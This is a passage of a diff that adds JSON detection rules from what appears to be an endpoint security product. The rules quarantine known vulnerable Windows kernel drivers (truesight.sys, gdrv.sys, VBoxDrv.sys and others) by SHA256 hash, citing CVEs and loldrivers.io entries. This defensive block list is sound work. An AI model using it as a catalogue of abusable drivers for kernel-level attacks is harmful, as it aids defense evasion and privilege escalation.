"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971968Z", + "creation_date": "2026-03-23T11:45:29.971970Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971975Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19bf0d0f55d2ad33ef2d105520bde8fb4286f00e9d7a721e3c9587b9408a0775", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5733b3d0-b9e9-5d21-a902-a154077b3dd6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160552Z", + "creation_date": "2026-03-23T11:45:31.160554Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160560Z", + "rule_level": 
null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89e3b48604ac98da4da740008b29295ad622b15a2f7eeec1fd5317d926ebe5c0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57395476-b9bf-5ab1-843f-744ed5960536", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608831Z", + "creation_date": "2026-03-23T11:45:29.608833Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608838Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e5abe4530eff3838d44516f95c15d8b3ec6cec44ca7b67998e50641c939d12a", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5740ede6-c4bf-5a59-bafc-b83fa883e0d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608265Z", + "creation_date": "2026-03-23T11:45:29.608267Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608272Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85d21ad0e0b43d122f3c9ec06036b08398635860c93d764f72fb550fb44cf786", + "comment": "Vulnerable Kernel Driver (aka STProcessMonitor.sys) [https://github.com/ANYLNK/STProcessMonitorBYOVD/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57459303-ac3a-5571-8b1f-f184176e461d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490540Z", + "creation_date": "2026-03-23T11:45:31.490542Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490548Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea32fb5b27bc5cf85af687d61837cee2ac67d2412c58ac32a7375afc8a7b3d39", + "comment": "Vulnerable Adlice 
Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "574a0095-9367-5774-b5ba-bc362c9beac9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142379Z", + "creation_date": "2026-03-23T11:45:31.142381Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142387Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "27ec009fd86898d1319bfe14483d131155e4b929fc8362cda1ab024960725474", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "574dc119-3840-538c-a80a-73ceff7626d2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495799Z", + "creation_date": "2026-03-23T11:45:31.495801Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495807Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e0872cd9f466ee89a64da287dd8dad21e0e73fd881c99f4c8200d76dcda31430", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57649369-37b8-5350-bc75-192d7e9425cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817817Z", + "creation_date": "2026-03-23T11:45:31.817820Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817829Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d95a9e6997a67a6a0d585f07615677820e018e8ed1fa34e50acf0d46cbcfbf1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57661967-aa58-5c12-81fd-887a50fdafb8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610245Z", + "creation_date": "2026-03-23T11:45:29.610247Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610253Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d3790af5f8e5c945410929e31d06144a471ac82f828afe89a4758a5bbeb7f9f", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "576e210c-edd3-53d5-886a-9f1a0617b5b4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142036Z", + "creation_date": "2026-03-23T11:45:31.142038Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142044Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f75699c821358703cf59589e13d48e83d51dcb051a4af138cf0e1f7d6d92183", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "577057c5-23f1-5cf1-b8a6-45190e460df3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143006Z", + "creation_date": "2026-03-23T11:45:31.143008Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143014Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "393ff33aa9e04350277df6435f9d132f28e8af72668cc7d1db3644601dd22a47", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"577371aa-1a00-587d-af4a-269529be1886", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477756Z", + "creation_date": "2026-03-23T11:45:30.477759Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477803Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe50be756c689ef56976d96135486ee66192a4de0b82b0d52521978fc589f6fa", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57784f2e-1743-5405-a96b-a9ddbed4ae6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486747Z", + "creation_date": "2026-03-23T11:45:31.486750Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486758Z", 
+ "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8a03dde054c42419614e7649b9453368130accaf814baad15464eaef4e8e9b3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5779cade-e444-5bde-aae0-037ec951d655", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609094Z", + "creation_date": "2026-03-23T11:45:29.609096Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609101Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b92cdb91a2e2fab3881d54f5862e723826b759749f837a11c9e9d85d52095a2", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "577cbf9a-0fc9-5e54-8006-61bfc349be68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820805Z", + "creation_date": "2026-03-23T11:45:31.820808Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820817Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c087844540dd9583221e2e5d10b1697cca3b8dfe1d1bffe0daf33cebcc7c524", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57830ccb-a899-597a-9e62-dd2401600958", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474054Z", + "creation_date": "2026-03-23T11:45:31.474058Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474069Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72d1c35e3a767ed6f6363e51e1c63f2fbfd076f7b2f2d286a64cd753122a33cb", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5786eae6-a35f-54e9-a5d8-320c2399bcf4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477820Z", + "creation_date": "2026-03-23T11:45:30.477824Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477833Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "253a549a1e13a5a7e242ac1b39d5bebc61dcec7794171a58093700ae760d4b71", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5787a165-db37-5a20-bead-f5edb69594c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.155506Z", + "creation_date": "2026-03-23T11:45:31.155508Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155513Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb0b66a978846cb92f09b2badcc5ef4a473383748e94645f81851794a0f27350", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "578ac9b1-9fe0-5dcf-a96e-02585fa08cb9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817661Z", + "creation_date": "2026-03-23T11:45:30.817663Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817669Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6575ea9b319beb3845d43ce2c70ea55f0414da2055fa82eec324c4cebdefe893", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "578e31a5-9066-5ae2-b2f6-06e35c3e19b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811186Z", + "creation_date": "2026-03-23T11:45:31.811189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811194Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31b4ddfe88418a83c71ce8d882403587caa02b2adeaedd3a24ece3863987451c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "579c7a5f-58cd-5f07-8a77-290c16ea399c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461296Z", + "creation_date": "2026-03-23T11:45:30.461299Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461308Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88fb0a846f52c3b680c695cd349bf56151a53a75a07b8b0b4fe026ab8aa0a9af", + "comment": "Vulnerable Kernel Driver (aka sfdrvx64.sys) [https://www.loldrivers.io/drivers/5a03dc5a-115d-4d6f-b5b5-685f4c014a69/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "579dffb8-b7b9-59d1-b3b3-3838a865d62a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973776Z", + "creation_date": "2026-03-23T11:45:29.973778Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973783Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7837cb350338c4958968d06b105466da6518f5bb522a6e70e87c0cad85128408", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57a32dc1-aa48-5e1e-86f3-9d04b0502187", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453606Z", + "creation_date": "2026-03-23T11:45:30.453610Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453619Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "677ec2df835069678876defc3ef5ff73f463ad39e8466d76632d06f6a29a494f", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57adfffe-1eea-5ef0-8b2f-60401cf49f18", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977107Z", + "creation_date": "2026-03-23T11:45:29.977109Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977115Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"b17507a3246020fa0052a172485d7b3567e0161747927f2edf27c40e310852e0", + "comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57b0b2e2-69ff-51b9-bec1-18c2f17e2a40", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462228Z", + "creation_date": "2026-03-23T11:45:30.462231Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462240Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76718b87861bf6e502aa95ea85e378326c8db1759fe010c941b26cba3c881133", + "comment": 